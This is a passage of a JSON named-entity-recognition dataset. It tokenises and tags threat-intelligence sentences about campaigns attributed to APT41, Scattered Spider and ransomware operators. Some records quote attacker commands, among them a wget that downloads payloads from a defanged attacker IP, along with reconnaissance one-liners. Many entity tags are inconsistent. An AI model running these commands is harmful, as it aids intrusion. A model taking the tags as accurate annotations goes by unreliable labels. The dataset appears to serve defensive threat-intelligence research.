"C0015,", "the", "threat", "actors", "used", "a", "malicious", "HTA", "file", "that", "contained", "a", "mix", "of", "encoded", "HTML", "and", "JavaScript/VBScript", "code." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "WMI", "to", "load", "Cobalt", "Strike", "onto", "additional", "hosts", "within", "a", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "PowerView's", "file", "share", "enumeration", "results", "were", "stored", "in", "the", "file", "`c:\\ProgramData\\found_shares.txt`." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "the", "command", "`net", "localgroup", "\"adminstrator\"", "`", "to", "identify", "accounts", "with", "local", "administrator", "rights." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "relied", "on", "users", "to", "enable", "macros", "within", "a", "malicious", "Microsoft", "Word", "document." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "For", "C0015,", "the", "threat", "actors", "used", "Cobalt", "Strike", "and", "Conti", "ransomware." ], "ner_tags": [ "O", "B-Idus", "O", "I-HackOrg", "I-HackOrg", "O", "B-Way", "B-Tool", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "named", "a", "binary", "file", "`compareForfor.jpg`", "to", "disguise", "it", "as", "a", "JPG", "file." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "`mshta`", "to", "execute", "DLLs." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "executed", "the", "PowerView", "ShareFinder", "module", "to", "identify", "open", "shares." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "Base64-encoded", "strings." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "the", "`tasklist", "/s`", "command", "as", "well", "as", "`taskmanager`", "to", "obtain", "a", "list", "of", "running", "processes." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "employed", "code", "that", "used", "`regsvr32`", "for", "execution." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "installed", "the", "AnyDesk", "remote", "desktop", "application", "onto", "the", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "RDP", "to", "access", "specific", "network", "hosts", "of", "interest." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "the", "commands", "`net", "view", "/all", "/domain`", "and", "`ping`", "to", "discover", "remote", "systems.", "They", "also", "used", "PowerView's", "PowerShell", "Invoke-ShareFinder", "script", "for", "file", "share", "enumeration." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "loaded", "DLLs", "via", "`rundll32`", "using", "the", "`svchost`", "process." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "For", "C0015,", "security", "researchers", "assessed", "the", "threat", "actors", "likely", "used", "a", "phishing", "campaign", "to", "distribute", "a", "weaponized", "attachment", "to", "victims." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "code", "to", "obtain", "the", "external", "public-facing", "IPv4", "address", "of", "the", "compromised", "host." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "the", "command", "`net", "view", "/all", "time`", "to", "gather", "the", "local", "time", "of", "a", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0015,", "the", "threat", "actors", "obtained", "a", "variety", "of", "tools,", "including", "AdFind,", "AnyDesk,", "and", "Process", "Hacker." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Tool", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "a", "malicious", "HTA", "file", "that", "contained", "a", "mix", "of", "HTML", "and", "JavaScript/VBScript", "code." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "B-Tool", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "`cmd.exe`", "to", "execute", "commands", "and", "run", "malicious", "binaries." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0015,", "the", "threat", "actors", "used", "`wmic`", "and", "`rundll32`", "to", "load", "Cobalt", "Strike", "onto", "a", "target", "host." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "a", "ConfuserEx", "obfuscated", "BADPOTATO", "exploit", "to", "abuse", "named-pipe", "impersonation", "for", "local", "`NT", "AUTHORITY\\SYSTEM`", "privilege", "escalation." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "hex-encoded", "PII", "data", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "collected", "information", "related", "to", "compromised", "machines", "as", "well", "as", "Personal", "Identifiable", "Information", "(PII)", "from", "victim", "networks." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "dead", "drop", "resolvers", "on", "two", "separate", "tech", "community", "forums", "for", "their", "KEYPLUG", "Windows-version", "backdoor;", "notably", "APT41", "updated", "the", "community", "forum", "posts", "frequently", "with", "new", "dead", "drop", "resolvers", "during", "the", "campaign." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "the", "DUSTPAN", "loader", "to", "decrypt", "embedded", "payloads." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "its", "Cloudflare", "services", "C2", "channels", "for", "data", "exfiltration." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "exfiltrated", "victim", "data", "via", "DNS", "lookups", "by", "encoding", "and", "prepending", "it", "as", "subdomains", "to", "the", "attacker-controlled", "domain." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "Cloudflare", "services", "for", "data", "exfiltration." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "B-Way", "B-Tool", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "exploited", "CVE-2021-44207", "in", "the", "USAHerds", "application", "and", "CVE-2021-44228", "in", "Log4j,", "as", "well", "as", "other", ".NET", "deserialization,", "SQL", "injection,", "and", "directory", "traversal", "vulnerabilities", "to", "gain", "initial", "access." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Tool", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "abused", "named", "pipe", "impersonation", "for", "privilege", "escalation." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "established", "persistence", "by", "loading", "malicious", "libraries", "via", "modifications", "to", "the", "Import", "Address", "Table", "(IAT)", "within", "legitimate", "Microsoft", "binaries." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "downloaded", "malicious", "payloads", "onto", "compromised", "systems." ], "ner_tags": [ "O", "O", "B-Idus", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "deployed", "JScript", "web", "shells", "on", "compromised", "systems." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "copied", "the", "local", "`SAM`", "and", "`SYSTEM`", "Registry", "hives", "to", "a", "staging", "directory." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "`SCHTASKS", "/Change`", "to", "modify", "legitimate", "scheduled", "tasks", "to", "run", "malicious", "code." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "file", "names", "beginning", "with", "USERS,", "SYSUSER,", "and", "SYSLOG", "for", "DEADEYE,", "and", "changed", "KEYPLUG", "file", "extensions", "from", ".vmp", "to", ".upx", "likely", "to", "avoid", "hunting", "detections." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "broke", "malicious", "binaries,", "including", "DEADEYE", "and", "KEYPLUG,", "into", "multiple", "sections", "on", "disk", "to", "evade", "detection." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "frequently", "configured", "the", "URL", "endpoints", "of", "their", "stealthy", "passive", "backdoor", "LOWKEY.PASSIVE", "to", "masquerade", "as", "normal", "web", "application", "traffic", "on", "an", "infected", "server." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "the", "Cloudflare", "CDN", "to", "proxy", "C2", "traffic." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "the", "following", "Windows", "scheduled", "tasks", "for", "DEADEYE", "dropper", "persistence", "on", "US", "state", "government", "networks:", "`\\Microsoft\\Windows\\PLA\\Server", "Manager", "Performance", "Monitor`,", "`\\Microsoft\\Windows\\Ras\\ManagerMobility`,", "`\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", "and", "`\\Microsoft\\Windows\\WDI\\USOShared`." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "copied", "the", "`SAM`", "and", "`SYSTEM`", "Registry", "hives", "for", "credential", "harvesting." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "VMProtect", "to", "slow", "the", "reverse", "engineering", "of", "malicious", "binaries." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "issued", "`ping", "-n", "1", "((cmd", "/c", "dir", "c:\\|findstr", "Number).split()[-1]+`", "commands", "to", "find", "the", "volume", "serial", "number", "of", "compromised", "systems." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "`cmd.exe", "/c", "ping", "%userdomain%`", "for", "discovery." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "`whoami`", "to", "gather", "information", "from", "victim", "machines." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "For", "C0017,", "APT41", "obtained", "publicly", "available", "tools", "such", "as", "YSoSerial.NET,", "ConfuserEx,", "and", "BadPotato." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "C0017,", "APT41", "ran", "`wget", "http://103.224.80[.]44:8080/kernel`", "to", "download", "malicious", "payloads." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "the", "Cloudflare", "services", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "deployed", "JScript", "web", "shells", "through", "the", "creation", "of", "malicious", "ViewState", "objects." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0017,", "APT41", "used", "`cmd.exe`", "to", "execute", "reconnaissance", "commands." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "Base64", "to", "encode", "their", "PowerShell", "scripts." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "AvosLocker", "ransomware", "to", "encrypt", "files", "on", "the", "compromised", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "exploited", "VMWare", "Horizon", "Unified", "Access", "Gateways", "that", "were", "vulnerable", "to", "several", "Log4Shell", "vulnerabilities,", "including", "CVE-2021-44228,", "CVE-2021-45046,", "CVE-2021-45105,", "and", "CVE-2021-44832." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "downloaded", "additional", "tools,", "such", "as", "Mimikatz", "and", "Sliver,", "as", "well", "as", "Cobalt", "Strike", "and", "AvosLocker", "ransomware", "onto", "the", "victim", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "transferred", "the", "SoftPerfect", "Network", "Scanner", "and", "other", "tools", "to", "machines", "in", "the", "network", "using", "AnyDesk", "and", "PDQ", "Deploy." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "C0018,", "AvosLocker", "was", "disguised", "using", "the", "victim", "company", "name", "as", "the", "filename." ], "ner_tags": [ "O", "B-Idus", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0018,", "the", "threat", "actors", "renamed", "a", "Sliver", "payload", "to", "`vmware_kb.exe`." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-SamFile" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "the", "SoftPerfect", "Network", "Scanner", "for", "network", "scanning." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "opened", "a", "variety", "of", "ports,", "including", "ports", "28035,", "32467,", "41578,", "and", "46892,", "to", "establish", "RDP", "connections." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "encoded", "PowerShell", "scripts", "for", "execution." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "AnyDesk", "to", "transfer", "tools", "between", "systems." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "opened", "a", "variety", "of", "ports", "to", "establish", "RDP", "connections,", "including", "ports", "28035,", "32467,", "41578,", "and", "46892." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "`rundll32`", "to", "run", "Mimikatz." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "PDQ", "Deploy", "to", "move", "AvosLocker", "and", "tools", "across", "the", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "ran", "`nslookup`", "and", "Advanced", "IP", "Scanner", "on", "the", "target", "network." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "collected", "`whoami`", "information", "via", "PowerShell", "scripts." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "For", "C0018,", "the", "threat", "actors", "acquired", "a", "variety", "of", "open", "source", "tools,", "including", "Mimikatz,", "Sliver,", "SoftPerfect", "Network", "Scanner,", "AnyDesk,", "and", "PDQ", "Deploy." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "I-Tool", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "C0018,", "the", "threat", "actors", "used", "WMIC", "to", "modify", "administrative", "settings", "on", "both", "a", "local", "and", "a", "remote", "host,", "likely", "as", "part", "of", "the", "first", "stages", "for", "their", "lateral", "movement;", "they", "also", "used", "WMI", "Provider", "Host", "(`wmiprvse.exe`)", "to", "execute", "a", "variety", "of", "encoded", "PowerShell", "scripts", "using", "the", "`DownloadString`", "method." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "used", "SSL", "via", "TCP", "port", "443", "for", "C2", "communications." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "used", "encoded", "PowerShell", "commands." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "deobfuscated", "encoded", "PowerShell", "commands", "including", "use", "of", "the", "specific", "string", "`'FromBase'+0x40+'String'`,", "in", "place", "of", "`FromBase64String`", "which", "is", "normally", "used", "to", "decode", "base64." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0021,", "the", "threat", "actors", "registered", "domains", "for", "use", "in", "C2." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0021,", "the", "threat", "actors", "used", "legitimate", "but", "compromised", "domains", "to", "host", "malicious", "payloads." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0021,", "the", "threat", "actors", "embedded", "a", "base64-encoded", "payload", "within", "a", "LNK", "file." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "downloaded", "additional", "tools", "and", "files", "onto", "victim", "machines." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "lured", "users", "into", "clicking", "a", "malicious", "link", "which", "led", "to", "the", "download", "of", "a", "ZIP", "archive", "containing", "a", "malicious", ".LNK", "file." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "used", "TCP", "for", "some", "C2", "communications." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "used", "obfuscated", "PowerShell", "to", "extract", "an", "encoded", "payload", "from", "within", "an", ".LNK", "file." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "used", "`rundll32.exe`", "to", "execute", "the", "Cobalt", "Strike", "Beacon", "loader", "DLL." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "sent", "phishing", "emails", "with", "unique", "malicious", "links,", "likely", "for", "tracking", "victim", "clicks." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0021,", "the", "threat", "actors", "used", "Cobalt", "Strike", "configured", "with", "a", "modified", "variation", "of", "the", "publicly", "available", "Pandora", "Malleable", "C2", "Profile." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0021,", "the", "threat", "actors", "uploaded", "malware", "to", "websites", "under", "their", "control." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0021,", "the", "threat", "actors", "used", "HTTP", "for", "some", "of", "their", "C2", "communications." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0026,", "the", "threat", "actors", "used", "WinRAR", "to", "collect", "documents", "on", "targeted", "systems.", "The", "threat", "actors", "appeared", "to", "only", "exfiltrate", "files", "created", "after", "January", "1,", "2021." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Time", "O", "O" ] }, { "tokens": [ "During", "C0026,", "the", "threat", "actors", "split", "encrypted", "archives", "containing", "stolen", "files", "and", "information", "into", "3MB", "parts", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0026,", "the", "threat", "actors", "collected", "documents", "from", "compromised", "hosts." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "C0026,", "the", "threat", "actors", "re-registered", "expired", "C2", "domains", "previously", "used", "for", "ANDROMEDA", "malware." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "C0026,", "the", "threat", "actors", "re-registered", "a", "ClouDNS", "dynamic", "DNS", "subdomain", "which", "was", "previously", "used", "by", "ANDROMEDA." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "C0026,", "the", "threat", "actors", "downloaded", "malicious", "payloads", "onto", "select", "compromised", "hosts." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "aws_consoler", "to", "create", "temporary", "federated", "credentials", "for", "fake", "users", "in", "order", "to", "obfuscate", "which", "AWS", "credential", "is", "compromised", "and", "enable", "pivoting", "from", "the", "AWS", "CLI", "to", "console", "sessions", "without", "MFA." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "IAM", "manipulation", "to", "gain", "persistence", "and", "to", "assume", "or", "elevate", "privileges." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "accessed", "Azure", "AD", "to", "download", "bulk", "lists", "of", "group", "members", "and", "to", 